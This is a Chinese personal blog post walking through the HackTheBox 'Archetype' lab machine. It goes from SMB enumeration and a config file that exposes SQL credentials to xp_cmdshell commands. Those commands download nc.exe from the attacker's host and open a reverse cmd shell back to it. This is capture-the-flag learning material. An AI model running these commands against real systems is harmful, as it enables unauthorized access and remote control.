banner
[面包]MrTwoC

[面包]MrTwoC

你好,欢迎来到这个基于区块链的个人博客 名字:面包 / MrTwoc 爱好:跑步(5/10KM)、咖啡、游戏(MMORPG、FPS、Minecraft、Warframe) 兴趣方向:Rust、区块链、网络安全、量子信息(量子计算)、游戏设计与开发
bilibili
steam
email
github

[记模拟渗透]-HackTheBox-Tier2 _ Archetype - 1

image.png
扫描 IP,看到 139 & 445 端口 ,知道是 SMB
db_nmap -sV 10.129.243.80
image.png
smbclient -L IP
尝试连接,密码为空,进入共享文件夹,看到一个文件
image.png
get prod.dtsConfig
下载到本地
cat prod.dtsConfig
发现其中 ID 与 passwd

image.png
impacket-mssqlclient sql_svc@ip -windows-auth
kali 自带的 msql 客户端连接 IP,密码为空

image.png
xp_cmdshell "whoami"
尝试能否输出 cmd 命令

image.png
xp_cmdshell "nc"
测试是否能使用 nc,nc 命令,如果有就可以通过反弹 shell 建立起一个持续性的 shell。
结果没有

在本地下载一个 nc.exe 准备好。

在 SQL > 中输入:
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.16.30/nc.exe -outfile nc.exe"

image.png

下载完成,nc lvnp 4443 监听 4443 端口
image.png
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc.exe -e cmd.exe 10.10.16.30 4443"
在此路径,执行 nc.exe,请求此 IP 的此端口,并获得 shell
目标系统:Windows

image.png
dir: 列出当前目录所有文件
cd .. 返回上级目录
type: 查看 user.txt 文件内容
最后在 Desktop 发现 user.txt,打开后,拿到 flag

=================================================================
C:\Users\sql_svc\Desktop>type user.txt
type user.txt

image.png

加载中...
此文章数据所有权由区块链加密技术和智能合约保障仅归创作者所有。